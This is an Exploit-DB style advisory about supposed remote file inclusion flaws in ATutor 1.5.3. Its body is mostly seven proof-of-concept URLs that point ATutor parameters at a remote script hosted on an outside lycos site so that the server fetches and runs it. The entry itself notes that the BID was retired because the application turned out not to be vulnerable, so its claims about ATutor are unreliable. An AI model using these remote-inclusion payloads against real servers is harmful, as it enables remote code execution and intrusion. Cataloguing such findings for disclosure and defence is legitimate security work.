ATutor 1.5.3 - Multiple Remote File Inclusions

EDB-ID:

28832

CVE:

N/A


Author:

SuBzErO

Type:

webapps


Platform:

PHP

Date:

2006-10-19


source: https://www.securityfocus.com/bid/20634/info

ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

ATutor 1.5.3.2 and prior versions are vulnerable to these issues; other versions may also be affected.

This BID is being retired; further analysis reveals that the application is not vulnerable to this issue.

http://www.example.com/ATutor/documentation/common/frame_toc.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/print.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/vitals.inc.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?